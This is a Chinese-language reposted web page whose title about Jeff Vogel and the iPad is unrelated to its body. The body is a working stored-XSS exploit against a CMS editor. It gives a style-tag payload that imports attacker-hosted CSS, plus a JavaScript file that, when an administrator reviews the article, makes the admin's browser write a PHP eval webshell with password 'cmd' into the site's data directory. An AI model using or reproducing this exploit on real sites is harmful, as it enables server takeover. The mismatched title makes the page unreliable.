您的位置:首页 > 其它

【Jeff Vogel:为什么我们不再针对iPad开发了】

2015-04-20 10:04 232 查看
作者:haris
漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行

目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。



下面说说利用方法。

条件有3个:

1.开启注册

2.开启投稿
3.管理员很勤劳,会去审核文章,最鸡肋的地方了
注册会员—-发表文章
内容填写:
<style>@im\port’\http://xxx.com/xss.css’;</style>

新建XSS.CXX

body{

background-image:url('javascript:document.write("")')

}


新建xss.js
内容
var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType('text/xml');

}

} else if(window.ActiveXObject) {

var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

for(var i=0; i try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

xmlhttp=request;

function getFolder( url ){

obj = url.split('/')

return obj[obj.length-2]

}

oUrl = top.location.href;

u = getFolder(oUrl);

add_admin();

function add_admin(){

var url= "/"+u+"/sys_sql_query.php";

var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++";

xmlhttp.open("POST", url, true);

xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xmlhttp.setRequestHeader("Content-length", params.length);

xmlhttp.setRequestHeader("Connection", "Keep-Alive");

xmlhttp.send(params);

}


当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: